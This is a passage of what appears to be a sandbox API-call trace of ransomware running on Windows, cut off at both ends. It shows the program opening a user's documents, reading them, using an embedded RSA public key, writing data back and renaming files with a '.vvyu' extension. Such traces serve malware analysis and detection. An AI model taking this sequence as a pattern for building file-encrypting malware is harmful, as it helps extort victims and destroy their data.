0x29f7e10 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ba8 [0200.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26668 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b60 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6bc0 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7630 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ba8 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf6e0 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a199e8 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bc0 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2adf8f0 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x29dcde8 [0200.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0200.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3f88 [0200.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a199e8 | out: hHeap=0x2c0000) returned 1 [0200.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0200.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8f0 | out: hHeap=0x2c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42628 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0200.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0200.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05870 | out: hHeap=0x2c0000) returned 1 [0200.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0200.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0200.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.399] WriteFile (in: hFile=0x52c, lpBuffer=0x2afb168*, nNumberOfBytesToWrite=0x4a6d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2afb168*, lpNumberOfBytesWritten=0x2f9fb14*=0x4a6d, lpOverlapped=0x0) returned 1 [0200.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2afb168 | out: hHeap=0x2c0000) returned 1 [0200.400] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x4a72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.400] WriteFile (in: hFile=0x52c, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0200.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0200.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0200.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0200.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0200.401] WriteFile (in: hFile=0x52c, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.402] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.402] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.402] CloseHandle (hObject=0x52c) returned 1 [0200.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x2adc6e8 [0200.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x2af3f88 [0200.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adc6e8 | out: hHeap=0x2c0000) returned 1 [0200.404] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\AFrd4UxBD1.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\afrd4uxbd1.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\AFrd4UxBD1.pdf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\afrd4uxbd1.pdf.vvyu")) returned 1 [0200.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.418] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0200.421] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972cf640, ftCreationTime.dwHighDateTime=0x1d89e78, ftLastAccessTime.dwLowDateTime=0xb1207b40, ftLastAccessTime.dwHighDateTime=0x1d8a0cf, ftLastWriteTime.dwLowDateTime=0xb1207b40, ftLastWriteTime.dwHighDateTime=0x1d8a0cf, nFileSizeHigh=0x0, nFileSizeLow=0x72ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a_eNlZ lSa4B_.ppt", cAlternateFileName="A_ENLZ~1.PPT")) returned 1 [0200.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x2a19588 [0200.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.422] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\a_eNlZ lSa4B_.ppt") returned=".ppt" [0200.422] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\a_eNlZ lSa4B_.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\a_enlz lsa4b_.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0200.423] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=29370) returned 1 [0200.423] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0200.425] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x7294, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.425] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.430] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.430] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x72ba, lpOverlapped=0x0) returned 1 [0200.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a79478 [0200.431] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.431] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.431] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31bca0) returned 1 [0200.432] CryptCreateHash (in: hProv=0x31bca0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0200.432] CryptHashData (hHash=0x2a05d28, pbData=0x2a79478, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.432] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0200.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0200.432] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0200.432] GetLastError () returned 0x0 [0200.432] CryptDestroyHash (hHash=0x2a05d28) returned 1 [0200.432] CryptReleaseContext (hProv=0x31bca0, dwFlags=0x0) returned 1 [0200.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.433] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0200.433] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0200.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.433] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0200.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x72c0) returned 0x2afb168 [0200.433] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a79478 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05870 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a058b8 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0200.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0200.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0200.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0200.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0200.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0200.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7d70 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6b18 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x29dcde8 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a197b8 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26668 [0200.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0200.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0200.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: 